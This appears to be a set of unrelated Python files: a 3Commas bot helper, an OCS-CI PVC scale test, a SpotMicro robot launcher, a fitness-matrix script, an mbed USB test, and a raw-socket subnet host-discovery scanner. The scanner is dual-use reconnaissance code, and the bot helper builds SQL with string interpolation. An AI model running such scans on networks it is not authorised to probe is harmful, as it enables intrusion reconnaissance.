def info(self, message, notify=False):
"""Info level."""
self.log(message, "info")
if self.notify_enabled and notify:
self.notificationhandler.send_notification(message)
def warning(self, message, notify=True):
"""Warning level."""
self.log(message, "warning")
if self.notify_enabled and notify:
self.notificationhandler.send_notification(message)
def error(self, message, notify=True):
"""Error level."""
self.log(message, "error")
if self.notify_enabled and notify:
self.notificationhandler.send_notification(message)
def debug(self, message, notify=False):
"""Debug level."""
self.log(message, "debug")
if self.notify_enabled and notify:
self.notificationhandler.send_notification(message)
def load_config():
"""Create default or load existing config file."""
cfg = configparser.ConfigParser()
if cfg.read(f"{datadir}/{program}.ini"):
return cfg
cfg["settings"] = {
"timezone": "Europe/Amsterdam",
"timeinterval": 3600,
"debug": False,
"logrotate": 7,
"botids": [12345, 67890],
"increment-step-scale": [0.10, 0.05, 0.05, 0.05, 0.05, 0.05],
"3c-apikey": "Your 3Commas API Key",
"3c-apisecret": "Your 3Commas API Secret",
"notifications": False,
"notify-urls": ["notify-url1"],
}
with open(f"{datadir}/{program}.ini", "w") as cfgfile:
cfg.write(cfgfile)
return None
def init_threecommas_api(cfg):
"""Init the 3commas API."""
return Py3CW(
key=cfg.get("settings", "3c-apikey"),
secret=cfg.get("settings", "3c-apisecret"),
request_options={
"request_timeout": 10,
"nr_of_retries": 3,
"retry_status_codes": [502],
},
)
def check_deal(dealid):
"""Check if deal was already logged."""
data = cursor.execute(f"SELECT * FROM deals WHERE dealid = {dealid}").fetchone()
if data is None:
return None
return data
def update_deal(thebot, deal, to_increment, new_percentage):
"""Update bot with new take profit percentage."""
bot_name = thebot["name"]
deal_id = deal["id"]
error, data = api.request(
entity="deals",
action="update_deal",
action_id=str(deal_id),
payload={
"deal_id": thebot["id"],
"take_profit": new_percentage,
},
)
if data:
logger.info(
f"Incremented TP for deal {deal_id}/{deal['pair']} and bot \"{bot_name}\"\n"
f"Changed TP from {deal['take_profit']}% to {new_percentage}% (+{to_increment}%)",
True,
)
else:
logger.error(
"Error occurred updating bot with new take profit values: %s" % error["msg"]
)
def increment_deals(thebot):
"""Check deals from bot and compare SO agains the database."""
deals_count = 0
deals = thebot["active_deals"]
print(thebot)
if deals:
for deal in deals:
deal_id = deal["id"]
completed_safety_orders_count = int(deal["completed_safety_orders_count"])
to_increment = 0
deals_count += 1
existing_deal = check_deal(deal_id)
if existing_deal is not None:
db.execute(
f"UPDATE deals SET safety_count = {completed_safety_orders_count} "
f"WHERE dealid = {deal_id}"
)
else:
db.execute(
f"INSERT INTO deals (dealid, safety_count) VALUES ({deal_id}, "
f"{completed_safety_orders_count})"
)
existing_deal_safety_count = (
0 if existing_deal is None else existing_deal["safety_count"]
)
for cnt in range(
existing_deal_safety_count + 1, completed_safety_orders_count + 1
):
try:
to_increment += float(increment_step_scale[cnt - 1])
except IndexError:
pass
if to_increment != 0.0:
new_percentage = round(float(deal["take_profit"]) + to_increment, 2)
update_deal(thebot, deal, round(to_increment, 2), new_percentage)
logger.info(
f"Finished updating {deals_count} deals for bot \"{thebot['name']}\""
)
db.commit()
def init_tpincrement_db():
"""Create or open database to store bot and deals data."""
try:
dbname = f"{program}.sqlite3"
dbpath = f"file:{datadir}/{dbname}?mode=rw"
dbconnection = sqlite3.connect(dbpath, uri=True)
dbconnection.row_factory = sqlite3.Row
logger.info(f"Database '{datadir}/{dbname}' opened successfully")
except sqlite3.OperationalError:
dbconnection = sqlite3.connect(f"{datadir}/{dbname}")
dbconnection.row_factory = sqlite3.Row
dbcursor = dbconnection.cursor()
logger.info(f"Database '{datadir}/{dbname}' created successfully")
dbcursor.execute(
"CREATE TABLE deals (dealid INT Primary Key, safety_count INT)"
)
logger.info("Database tables created successfully")
return dbconnection
def upgrade_tpincrement_db():
"""Upgrade database if needed."""
try:
cursor.execute("ALTER TABLE deals DROP COLUMN increment")
logger.info("Database schema upgraded")
except sqlite3.OperationalError:
logger.debug("Database schema is up-to-date")
def upgrade_config(cfg):
"""Upgrade config file if needed."""
try:
cfg.get("settings", "increment-step-scale")
except configparser.NoOptionError:
cfg.set(
"settings", "increment-step-scale", "[0.10, 0.05, 0.05, 0.05, 0.05, 0.05]"
)
cfg.remove_option("settings", "increment-percentage")
with open(f"{datadir}/{program}.ini", "w+") as cfgfile:
cfg.write(cfgfile)
return cfg
# Start application
program = Path(__file__).stem
# Parse and interpret options.
parser = argparse.ArgumentParser(description="Cyberjunky's 3Commas bot helper.")
parser.add_argument("-d", "--datadir", help="data directory to use", type=str)
args = parser.parse_args()
if args.datadir:
datadir = args.datadir
else:
datadir = os.getcwd()
# Create or load configuration file
config = load_config()
if not config:
logger = Logger(None, 7, False, False)
logger.info(f"3Commas bot helper {program}")
logger.info("Started at %s." % time.strftime("%A %H:%M:%S %d-%m-%Y"))
logger.info(
f"Created example config file '{datadir}/{program}.ini', edit it and restart the program."
)
sys.exit(0)
else:
# Upgrade config file if needed
config = upgrade_config(config)
# Handle timezone
if hasattr(time, "tzset"):
os.environ["TZ"] = config.get(
"settings", "timezone", fallback="Europe/Amsterdam"
)
time.tzset()
# Init notification handler
notification = NotificationHandler(
config.getboolean("settings", "notifications"),
config.get("settings", "notify-urls"),
)
# Init logging
logger = Logger(
notification,
int(config.get("settings", "logrotate", fallback=7)),
config.getboolean("settings", "debug"),
config.getboolean("settings", "notifications"),
)
logger.info(f"3Commas bot helper {program}")
logger.info("Started at %s" % time.strftime("%A %H:%M:%S %d-%m-%Y"))
logger.info(f"Loaded configuration from '{datadir}/{program}.ini'")
if notification.enabled:
logger.info("Notifications are enabled")
else:
logger.info("Notifications are disabled")
# Initialize 3Commas API
api = init_threecommas_api(config)
# Initialize or open database
db = init_tpincrement_db()
cursor = db.cursor()
# Upgrade database if needed
upgrade_tpincrement_db()
# Auto increment TP %
while True:
config = load_config()
logger.info(f"Reloaded configuration from '{datadir}/{program}.ini'")
# User settings
botids = json.loads(config.get("settings", "botids"))
timeint = int(config.get("settings", "timeinterval"))
increment_step_scale = json.loads(config.get("settings", "increment-step-scale"))
# Walk through all bots specified
for bot in botids:
boterror, botdata = api.request(
entity="bots",
action="show",
action_id=str(bot),
)
if botdata:
increment_deals(botdata)
else:
logger.error("Error occurred incrementing deals: %s" % boterror["msg"])
if timeint > 0:
localtime = time.time()
nexttime = localtime + int(timeint)
timeresult = time.strftime("%H:%M:%S", time.localtime(nexttime))
logger.info("Next update in %s Seconds at %s" % (timeint, timeresult), True)
time.sleep(timeint)
else:
break
|
test_pvc_creation_deletion_scale.py
|
"""
Test to measure pvc scale creation & deletion time. Total pvc count would be 1500
"""
import logging
import csv
import random
import pytest
import threading
from tests import helpers
from ocs_ci.framework.testlib import scale, E2ETest, polarion_id
from ocs_ci.ocs import constants
from ocs_ci.utility.utils import ocsci_log_path
log = logging.getLogger(__name__)
@scale
class TestPVCCreationDeletionScale(E2ETest):
"""
Base class for PVC scale creation and deletion
"""
@pytest.fixture()
def namespace(self, project_factory):
"""
Create a new project
"""
proj_obj = project_factory()
self.namespace = proj_obj.namespace
@pytest.mark.parametrize(
argnames=["access_mode", "interface"],
argvalues=[
pytest.param(
*[constants.ACCESS_MODE_RWO, constants.CEPHBLOCKPOOL],
marks=pytest.mark.polarion_id("OCS-1225")
),
pytest.param(
*[constants.ACCESS_MODE_RWX, constants.CEPHBLOCKPOOL],
marks=pytest.mark.polarion_id("OCS-2010")
),
pytest.param(
*[constants.ACCESS_MODE_RWX, constants.CEPHFS_INTERFACE],
marks=pytest.mark.polarion_id("OCS-2008")
),
]
)
@pytest.mark.usefixtures(namespace.__name__)
def test_multiple_pvc_creation_deletion_scale(self, namespace, access_mode, interface):
"""
Measuring PVC creation time while scaling PVC
Measure PVC deletion time after creation test
"""
number_of_pvc = 1500
log.info(f"Start creating {access_mode}-{interface} {number_of_pvc} PVC")
if interface == constants.CEPHBLOCKPOOL:
self.sc_obj = constants.DEFAULT_STORAGECLASS_RBD
elif interface == constants.CEPHFS_INTERFACE:
self.sc_obj = constants.DEFAULT_STORAGECLASS_CEPHFS
# Create PVC
pvc_objs = helpers.create_multiple_pvcs(
sc_name=self.sc_obj,
namespace=self.namespace,
number_of_pvc=number_of_pvc,
size=f"{random.randrange(5, 105, 5)}Gi",
access_mode=access_mode
)
# Check for PVC status using threads
threads = list()
for obj in pvc_objs:
process = threading.Thread(
target=helpers.wait_for_resource_state,
args=(obj, constants.STATUS_BOUND, )
)
process.start()
threads.append(process)
for process in threads:
process.join()
# Get pvc_name, require pvc_name to fetch creation time data from log
threads = list()
for pvc_obj in pvc_objs:
process = threading.Thread(target=pvc_obj.reload)
process.start()
threads.append(process)
for process in threads:
process.join()
pvc_name_list, pv_name_list = ([] for i in range(2))
threads = list()
for pvc_obj in pvc_objs:
process1 = threading.Thread(target=pvc_name_list.append(pvc_obj.name))
process2 = threading.Thread(target=pv_name_list.append(pvc_obj.backed_pv))
process1.start()
process2.start()
threads.append(process1)
threads.append(process2)
for process in threads:
process.join()
# Get PVC creation time
pvc_create_time = helpers.measure_pvc_creation_time_bulk(
interface=interface, pvc_name_list=pvc_name_list
)
# TODO: Update below code with google API, to record value in spreadsheet
# TODO: For now observing Google API limit to write more than 100 writes
log_path = f"{ocsci_log_path()}/{self.sc_obj}-{access_mode}"
with open(f"{log_path}-creation-time.csv", "w") as fd:
csv_obj = csv.writer(fd)
for k, v in pvc_create_time.items():
csv_obj.writerow([k, v])
logging.info(
f"Create data present in {log_path}-creation-time.csv file"
)
# Delete PVC
for obj in pvc_objs:
obj.delete()
obj.ocp.wait_for_delete(obj.name)
# Get PVC deletion time
pvc_deletion_time = helpers.measure_pv_deletion_time_bulk(
interface=interface, pv_name_list=pv_name_list
)
# Update result to csv file.
# TODO: Update below code with google API, to record value in spreadsheet
# TODO: For now observing Google API limit to write more than 100 writes
with open(f"{log_path}-deletion-time.csv", "w") as fd:
csv_obj = csv.writer(fd)
for k, v in pvc_deletion_time.items():
csv_obj.writerow([k, v])
logging.info(
f"Delete data present in {log_path}-deletion-time.csv file"
)
@polarion_id('OCS-1885')
@pytest.mark.usefixtures(namespace.__name__)
def test_all_4_type_pvc_creation_deletion_scale(self, namespace):
"""
Measuring PVC creation time while scaling PVC of all 4 types, Total 1500 PVCs
will be created, i.e. 375 each pvc type
Measure PVC deletion time in scale env
"""
number_of_pvc = 375
log.info(f"Start creating {number_of_pvc} PVC of all 4 types")
cephfs_sc_obj = constants.DEFAULT_STORAGECLASS_CEPHFS
rbd_sc_obj = constants.DEFAULT_STORAGECLASS_RBD
# Create all 4 types of PVC
fs_pvc_obj, rbd_pvc_obj = ([] for i in range(2))
for mode in [constants.ACCESS_MODE_RWO, constants.ACCESS_MODE_RWX]:
fs_pvc_obj.extend(helpers.create_multiple_pvcs(
sc_name=cephfs_sc_obj, namespace=self.namespace, number_of_pvc=number_of_pvc,
size=f"{random.randrange(5, 105, 5)}Gi", access_mode=mode)
)
rbd_pvc_obj.extend(helpers.create_multiple_pvcs(
sc_name=rbd_sc_obj, namespace=self.namespace, number_of_pvc=number_of_pvc,
size=f"{random.randrange(5, 105, 5)}Gi", access_mode=mode)
)
# Check for PVC status using threads
threads = list()
for obj in fs_pvc_obj:
process = threading.Thread(
target=helpers.wait_for_resource_state,
args=(obj, constants.STATUS_BOUND, )
)
process.start()
threads.append(process)
for obj in rbd_pvc_obj:
process = threading.Thread(
target=helpers.wait_for_resource_state,
args=(obj, constants.STATUS_BOUND,)
)
process.start()
threads.append(process)
for process in threads:
process.join()
# Get pvc_name, require pvc_name to fetch creation time data from log
threads = list()
for fs_obj, rbd_obj in zip(fs_pvc_obj, rbd_pvc_obj):
process1 = threading.Thread(target=fs_obj.reload)
process2 = threading.Thread(target=rbd_obj.reload)
process1.start()
process2.start()
threads.append(process1)
threads.append(process2)
for process in threads:
process.join()
fs_pvc_name, rbd_pvc_name = ([] for i in range(2))
fs_pv_name, rbd_pv_name = ([] for i in range(2))
threads = list()
for fs_obj, rbd_obj in zip(fs_pvc_obj, rbd_pvc_obj):
process1 = threading.Thread(target=fs_pvc_name.append(fs_obj.name))
process2 = threading.Thread(target=rbd_pvc_name.append(rbd_obj.name))
process3 = threading.Thread(target=fs_pv_name.append(fs_obj.backed_pv))
process4 = threading.Thread(target=rbd_pv_name.append(rbd_obj.backed_pv))
process1.start()
process2.start()
process3.start()
process4.start()
threads.append(process1)
threads.append(process2)
threads.append(process3)
threads.append(process4)
for process in threads:
process.join()
# Get PVC creation time
fs_pvc_create_time = helpers.measure_pvc_creation_time_bulk(
interface=constants.CEPHFS_INTERFACE, pvc_name_list=fs_pvc_name
)
rbd_pvc_create_time = helpers.measure_pvc_creation_time_bulk(
interface=constants.CEPHBLOCKPOOL, pvc_name_list=rbd_pvc_name
)
fs_pvc_create_time.update(rbd_pvc_create_time)
# TODO: Update below code with google API, to record value in spreadsheet
# TODO: For now observing Google API limit to write more than 100 writes
log_path = f"{ocsci_log_path()}/All-type-PVC"
with open(f"{log_path}-creation-time.csv", "w") as fd:
csv_obj = csv.writer(fd)
for k, v in fs_pvc_create_time.items():
csv_obj.writerow([k, v])
logging.info(
f"Create data present in {log_path}-creation-time.csv file"
)
# Delete PVC
pvc_objs = fs_pvc_obj + rbd_pvc_obj
for obj in pvc_objs:
obj.delete()
obj.ocp.wait_for_delete(obj.name)
# Get PVC deletion time
fs_pvc_deletion_time = helpers. measure_pv_deletion_time_bulk(
interface=constants.CEPHFS_INTERFACE, pv_name_list=fs_pv_name
)
rbd_pvc_deletion_time = helpers.measure_pv_deletion_time_bulk(
interface=constants.CEPHBLOCKPOOL, pv_name_list=rbd_pv_name
)
fs_pvc_deletion_time.update(rbd_pvc_deletion_time)
# TODO: Update below code with google API, to record value in spreadsheet
# TODO: For now observing Google API limit to write more than 100 writes
with open(f"{log_path}-deletion-time.csv", "w") as fd:
csv_obj = csv.writer(fd)
for k, v in fs_pvc_deletion_time.items():
csv_obj.writerow([k, v])
logging.info(
f"Delete data present in {log_path}-deletion-time.csv file"
)
|
main.py
|
#!/usr/bin/env python3
import sys, os, signal
from spotmicro.utilities.log import Logger
from spotmicro.utilities.config import Config
import multiprocessing
from multiprocessing.managers import BaseManager
from queue import LifoQueue
from spotmicro.motion_controller.motion_controller import MotionController
from spotmicro.abort_controller.abort_controller import AbortController
from spotmicro.lcd_screen_controller.lcd_screen_controller import LCDScreenController
from spotmicro.remote_controller.remote_controller import RemoteControllerController
log = Logger().setup_logger()
def process_abort_controller(communication_queues):
abort = AbortController(communication_queues)
abort.do_process_events_from_queue()
def process_motion_controller(communication_queues):
motion = MotionController(communication_queues)
motion.do_process_events_from_queues()
def process_remote_controller_controller(communication_queues):
remote_controller = RemoteControllerController(communication_queues)
remote_controller.do_process_events_from_queues()
# Optional
def process_output_lcd_screen_controller(communication_queues):
lcd_screen = LCDScreenController(communication_queues)
lcd_screen.do_process_events_from_queue()
# create manager that knows how to create and manage LifoQueues
# class MyManager(BaseManager):
# pass
def create_controllers_queues():
# https://docs.python.org/3/library/queue.html
# The reason we use queues for inter process communication is because simplicity
# Why we use multiple queues? Because we limit the number of messages on them and
# some sensors read and update them at very high frequency, other don't. Having a sole queue
# makes the high frequency update controllers to wipe out the slow ones messages.
# Get and Put methods handle the locks via optional parameter block=True
# Queues must be 10ish, controller will flood with orders, we use .get(block true) to avoid
# this we read as we can process
# MyManager.register('LifoQueue', LifoQueue)
# manager = MyManager()
# manager.start()
communication_queues = {'abort_controller': multiprocessing.Queue(10),
# 'motion_controller': manager.LifoQueue(),
'motion_controller': multiprocessing.Queue(1),
'lcd_screen_controller': multiprocessing.Queue(10)}
log.info('Created the communication queues: ' + ', '.join(communication_queues.keys()))
return communication_queues
def close_controllers_queues(communication_queues):
log.info('Closing controller queues')
for queue in communication_queues.items():
queue.close()
queue.join_thread()
def main():
communication_queues = create_controllers_queues()
# Start the abort controller
# 0E port from PCA9685 must be HIGH
abort_controller = multiprocessing.Process(target=process_abort_controller, args=(communication_queues,))
abort_controller.daemon = True # The daemon process will continue to run as long as the main process is executing
# and it will terminate after finishing its execution or when the main program would be killed.
# Start the motion controller
# Process/Thread, listening the events QUEUE for orders
motion_controller = multiprocessing.Process(target=process_motion_controller, args=(communication_queues,))
motion_controller.daemon = True # The daemon process will continue to run as long as the main process is executing
# and it will terminate after finishing its execution or when the main program would be killed.
# Activate Bluetooth controller
# Capture the buttons from the controller and generate events for the QUEUE
remote_controller_controller = multiprocessing.Process(target=process_remote_controller_controller,
args=(communication_queues,))
remote_controller_controller.daemon = True
# Activate Screen
# Show communication on it about the status
lcd_screen_controller = multiprocessing.Process(target=process_output_lcd_screen_controller,
args=(communication_queues,))
lcd_screen_controller.daemon = True
# Start the threads queue processing
abort_controller.start()
motion_controller.start()
remote_controller_controller.start()
lcd_screen_controller.start()
if not abort_controller.is_alive():
log.error("SpotMicro can't work without abort_controller")
sys.exit(1)
if not motion_controller.is_alive():
log.error("SpotMicro can't work without motion_controller")
sys.exit(1)
if not remote_controller_controller:
log.error("SpotMicro can't work without remote_controller_controller")
sys.exit(1)
# make sure the thread/process ends
abort_controller.join()
motion_controller.join()
remote_controller_controller.join()
lcd_screen_controller.join()
close_controllers_queues(communication_queues)
if __name__ == '__main__':
log.info('SpotMicro starting...')
try:
main()
# except Exception as e:
# log.error('Terminated due error')
except KeyboardInterrupt:
log.info('Terminated due Control+C was pressed')
else:
log.info('Normal termination')
|
scanner.py
|
# coding=utf-8
"""
基于sniffer_with_icmp构建的嗅探器
前置依赖:pip install netaddr 或 easy_install netaddr
"""
import os
import socket
import struct
import threading
from ctypes import *
from netaddr import IPNetwork, IPAddress
def udp_sender(subnet, magic_message):
"""
批量发送UDP数据包
:param subnet:
:param magic_message:
:return:
"""
sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
for ip in IPNetwork(subnet):
try:
sender.sendto(magic_message, ("%s" % ip, 65212))
except:
pass
class IP(Structure):
"""
从C语言中获得IP头的结构定义
"""
_fields_ = [
("ihl", c_ubyte, 4),
("version", c_ubyte, 4),
("tos", c_ubyte),
("len", c_ushort),
("id", c_ushort),
("offset", c_ushort),
("ttl", c_ubyte),
("protocol_num", c_ubyte),
("sum", c_ushort),
# 32bit
# ("src", c_ulong),
# ("dst", c_ulong),
# 64bit
("src", c_uint32),
("dst", c_uint32)
]
def __new__(self, socket_buffer=None):
return self.from_buffer_copy(socket_buffer)
def __init__(self, socket_buffer=None):
# 协议字段和协议名称对应
self.protocol_map = {1: "ICMP", 6: "TCP", 17: "UDP"}
# 对IP地址进行格式化 32bit
# self.src_address = socket.inet_ntoa(struct.pack("<L", self.src))
# self.dst_address = socket.inet_ntoa(struct.pack("<L", self.dst))
# 对IP地址进行格式化 64bit
self.src_address = socket.inet_ntoa(struct.pack("@I", self.src))
self.dst_address = socket.inet_ntoa(struct.pack("@I", self.dst))
# 格式化协议类型
try:
self.protocol = self.protocol_map[self.protocol_num]
except:
self.protocol = str(self.protocol_num)
class ICMP(Structure):
_fields_ = [
("type", c_ubyte),
("code", c_ubyte),
("checksum", c_ushort),
("unused", c_ushort),
("next_hop_mtu", c_ushort)
]
def __new__(self, socket_buffer):
return self.from_buffer_copy(socket_buffer)
def __init__(self, socket_buffer):
pass
def driver():
# 监听的主机
host = "192.168.1.102"
# 扫描的目标子网
subnet = "192.168.1.0/24"
# 自定义的字符串,将会在ICMP的响应中进行核对
magic_message = "PYTHONRULES!"
# 创建原始Socket,然后绑定在公开接口上
if os.name == "nt":
socket_protocol = socket.IPPROTO_IP
else:
socket_protocol = socket.IPPROTO_ICMP
sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)
sniffer.bind((host, 0))
# 将IPv4头信息打包
sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
# 设置混杂模式
if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
# 开始发送数据包
t = threading.Thread(target=udp_sender, args=(subnet, magic_message))
t.start()
try:
while True:
# 读取数据包
raw_buffer = sniffer.recvfrom(65565)[0]
# 将缓冲区的前20个字节按照IP头进行解析(32位)
# ip_header = IP(raw_buffer[0:20])
# 将缓冲区的前32个字节按照IP头进行解析(64位)
ip_header = IP(raw_buffer[0:32])
# print "Protocol: %s %s -> %s" % (ip_header.protocol, ip_header.src_address, ip_header.dst_address)
# 如果是ICMP,进行进一步处理
if ip_header.protocol == "ICMP":
# 计算ICMP包的起始位置
offset = ip_header.ihl * 4
buf = raw_buffer[offset:offset + sizeof(ICMP)]
# 解析数据
icmp_header = ICMP(buf)
# print "ICMP -> Type: %d Code: %d" % (icmp_header.type, icmp_header.code)
# 检查类型和代码值是否为3 -> 表示着不可达
if icmp_header.code == 3 and icmp_header.type == 3:
# 确认响应的主机在我们的目标子网内
if IPAddress(ip_header.src_address) in IPNetwork(subnet):
# 确认ICMP数据中包含我们发送的自定义字符串
if raw_buffer[len(raw_buffer) - len(magic_message):] == magic_message:
print "Host Up: %s" % ip_header.src_address
# handle CTRL-C
except KeyboardInterrupt:
# 在Windows平台上关闭混杂模式
if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
# 输出:
# Host Up: 192.168.1.188
driver()
|
get_file.py
|
import os
import sys
import threading
import numpy as np
'''
This file for generate matrix avg, matrix max, matrix min for plotting fitness purpose
Before running this script, please checks some parameter below :
1. Rootdir : Contain your root directory path
2. Dataset : Dataset name that you want to use
3. SavedFileName : Filename to save
The results of this script are matrix avg, max, & min with format :
- Matrix Avg : targetDir+'/matrixAvg-(#-Running)-(TypeofXprmt).csv'
- Matrix Max : targetDir+'/matrixMax-(#-Running)-(TypeofXprmt).csv'
- MAtrix Min : targetDir+'/matrixMin-(#-Running)-(TypeofXprmt).csv'
'''
def getfile(rootdir, dataset):
#rootdir = '/home/banua/xprmt/xprmt-icacsis16/0008/'
#dataset = 'jamu'
targetDir = '/home/banua/xprmt/xprmt-icacsis16/'+dataset
matrixMax = np.array([])
matrixFitness = np.zeros((101, 1))
# print 'Please Wait..'
for i in os.listdir(rootdir):
for j in os.listdir(rootdir+i):
if dataset in j:
tcounter = 0
for x in os.listdir(rootdir+i+'/'+j):
# print '.'
if 'gen-' in x:
tcounter += 1
splitkata = x.split('-')
fname = rootdir+i+'/'+j+'/'+x+'/hofFitness.csv'
hof = np.loadtxt(fname, delimiter=',')
matrixFitness[int(splitkata[1])] = hof[0]
# print matrixFitness
status = False
for k in range(0, 10):
if matrixFitness[k] < matrixFitness[k+1]:
status = False
print j, ' ', i
break
else :
status = True
if status == False :
matrixMax = np.hstack([matrixMax, np.asarray(matrixFitness)]) if matrixMax.size else np.asarray(matrixFitness)
# print matrixFitness
print matrixMax.shape
np.savetxt(targetDir + '/matrixMax-' + dataset + '-1.csv', matrixMax, fmt='%.5e', delimiter='\t')
try:
# (threading.Thread(target=getfile, args=('/home/banua/xprmt/xprmt-icacsis16/0007/', 'jamu'))).start()
(threading.Thread(target=getfile, args=('/home/banua/xprmt/xprmt-icacsis16/0001/', 'maccs'))).start()
(threading.Thread(target=getfile, args=('/home/banua/xprmt/xprmt-icacsis16/0001/', 'zoo'))).start()
except:
print "Error: unable to start thread"
|
pyusb_basic.py
|
"""
mbed SDK
Copyright (c) 2018-2019 ARM Limited
SPDX-License-Identifier: Apache-2.0
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
from mbed_host_tests import BaseHostTest
from argparse import ArgumentParser
import time
import sys
import inspect
from threading import Thread, Event, Timer
import array
import random
import os
import traceback
import usb.core
from usb.util import build_request_type
from usb.util import CTRL_OUT, CTRL_IN
from usb.util import CTRL_TYPE_STANDARD, CTRL_TYPE_CLASS, CTRL_TYPE_VENDOR
from usb.util import (CTRL_RECIPIENT_DEVICE, CTRL_RECIPIENT_INTERFACE,
CTRL_RECIPIENT_ENDPOINT, CTRL_RECIPIENT_OTHER)
from usb.util import (DESC_TYPE_DEVICE, DESC_TYPE_CONFIG, DESC_TYPE_STRING,
DESC_TYPE_INTERFACE, DESC_TYPE_ENDPOINT)
import struct
if sys.platform.startswith('win'):
# Use libusb0 on Windows. libusb1 implementation for Windows
# does not support all features necessary for testing.
import usb.backend.libusb0
USB_BACKEND = usb.backend.libusb0.get_backend()
else:
# Use a default backend on other platforms.
USB_BACKEND = None
def get_interface(dev, interface, alternate=0):
intf = None
for active_if in dev.get_active_configuration():
if active_if.bInterfaceNumber == interface and active_if.bAlternateSetting == alternate:
assert intf is None, "duplicate interface"
intf = active_if
return intf
VENDOR_TEST_CTRL_IN = 1
VENDOR_TEST_CTRL_OUT = 2
VENDOR_TEST_CTRL_NONE = 3
VENDOR_TEST_CTRL_IN_DELAY = 4
VENDOR_TEST_CTRL_OUT_DELAY = 5
VENDOR_TEST_CTRL_NONE_DELAY = 6
VENDOR_TEST_CTRL_IN_STATUS_DELAY = 7
VENDOR_TEST_CTRL_OUT_STATUS_DELAY = 8
VENDOR_TEST_CTRL_IN_SIZES = 9
VENDOR_TEST_CTRL_OUT_SIZES = 10
VENDOR_TEST_RW_RESTART = 11
VENDOR_TEST_ABORT_BUFF_CHECK = 12
VENDOR_TEST_UNSUPPORTED_REQUEST = 32
REQUEST_GET_STATUS = 0
REQUEST_CLEAR_FEATURE = 1
REQUEST_SET_FEATURE = 3
REQUEST_SET_ADDRESS = 5
REQUEST_GET_DESCRIPTOR = 6
REQUEST_SET_DESCRIPTOR = 7
REQUEST_GET_CONFIGURATION = 8
REQUEST_SET_CONFIGURATION = 9
REQUEST_GET_INTERFACE = 10
REQUEST_SET_INTERFACE = 11
REQUEST_SYNCH_FRAME = 12
FEATURE_ENDPOINT_HALT = 0
FEATURE_DEVICE_REMOTE_WAKEUP = 1
DEVICE_QUALIFIER_DESC_SIZE = 10
DESC_TYPE_DEVICE_QUALIFIER = 0x06
DEVICE_DESC_SIZE = 18
device_descriptor_parser = struct.Struct('BBHBBBBHHHBBBB')
device_descriptor_keys = ['bLength', 'bDescriptorType', 'bcdUSB', 'bDeviceClass',
'bDeviceSubClass', 'bDeviceProtocol', 'bMaxPacketSize0',
'idVendor', 'idProduct', 'bcdDevice', 'iManufacturer',
'iProduct', 'iSerialNumber', 'bNumConfigurations']
CONFIGURATION_DESC_SIZE = 9
configuration_descriptor_parser = struct.Struct('BBHBBBBB')
configuration_descriptor_keys = ['bLength', 'bDescriptorType', 'wTotalLength',
'bNumInterfaces', 'bConfigurationValue',
'iConfiguration', 'bmAttributes', 'bMaxPower']
INTERFACE_DESC_SIZE = 9
interface_descriptor_parser = struct.Struct('BBBBBBBBB')
interface_descriptor_keys = ['bLength', 'bDescriptorType', 'bInterfaceNumber',
'bAlternateSetting', 'bNumEndpoints',
'bInterfaceClass', 'bInterfaceSubClass',
'bInterfaceProtocol', 'iInterface']
ENDPOINT_DESC_SIZE = 7
interface_descriptor_parser = struct.Struct('BBBBBHB')
interface_descriptor_keys = ['bLength', 'bDescriptorType', 'bEndpointAddress',
'bmAttributes', 'wMaxPacketSize', 'bInterval']
ENDPOINT_TYPE_NAMES = {
usb.ENDPOINT_TYPE_BULK: 'BULK',
usb.ENDPOINT_TYPE_CONTROL: 'CONTROL',
usb.ENDPOINT_TYPE_INTERRUPT: 'INTERRUPT',
usb.ENDPOINT_TYPE_ISOCHRONOUS: 'ISOCHRONOUS'}
# Greentea message keys used to notify DUT of test status
MSG_KEY_TEST_CASE_FAILED = 'fail'
MSG_KEY_TEST_CASE_PASSED = 'pass'
MSG_VALUE_DUMMY = '0'
def format_local_error_msg(fmt):
"""Return an error message formatted with the last traceback entry from this file.
The message is formatted according to fmt with data from the last traceback
enrty internal to this file. There are 4 arguments supplied to the format
function: filename, line_number, exc_type and exc_value.
Returns None if formatting fails.
"""
try:
exc_type, exc_value, exc_traceback = sys.exc_info()
# A list of 4-tuples (filename, line_number, function_name, text).
tb_entries = traceback.extract_tb(exc_traceback)
# Reuse the filename from the first tuple instead of relying on __file__:
# 1. No need for path handling.
# 2. No need for file extension handling (i.e. .py vs .pyc).
name_of_this_file = tb_entries[0][0]
last_internal_tb_entry = [tb for tb in tb_entries if tb[0] == name_of_this_file][-1]
msg = fmt.format(
filename=last_internal_tb_entry[0],
line_number=last_internal_tb_entry[1],
exc_type=str(exc_type).strip(),
exc_value=str(exc_value).strip(),
)
except (IndexError, KeyError):
msg = None
return msg
class PyusbBasicTest(BaseHostTest):
def test_usb_device(self, usb_dev_serial_number, test_fun, **test_fun_kwargs):
"""Find a USB device and execute a testing function.
Search is based on usb_dev_serial_number. If the device is found, the
test_fun is executed with its dev argument set to the device found and
all other kwargs set as specified by test_fun_kwargs.
The DUT is notified with either success, failure or error status.
"""
usb_device = self.find_device(usb_dev_serial_number)
if usb_device is None:
self.notify_error('USB device (SN={}) not found.'.format(usb_dev_serial_number))
return
try:
test_fun(usb_device, **test_fun_kwargs)
self.notify_success()
except RuntimeError as exc:
self.notify_failure(exc)
except usb.core.USBError as exc:
error_msg = format_local_error_msg('[{filename}]:{line_number}, Dev-host transfer error ({exc_value}).')
self.notify_failure(error_msg if error_msg is not None else exc)
def _callback_control_basic_test(self, key, value, timestamp):
serial_number, vendor_id, product_id = value.split(' ')
self.test_usb_device(
usb_dev_serial_number=serial_number,
test_fun=control_basic_test,
log=print,
vendor_id=int(vendor_id),
product_id=int(product_id)
)
def _callback_control_stall_test(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
test_fun=control_stall_test,
log=print
)
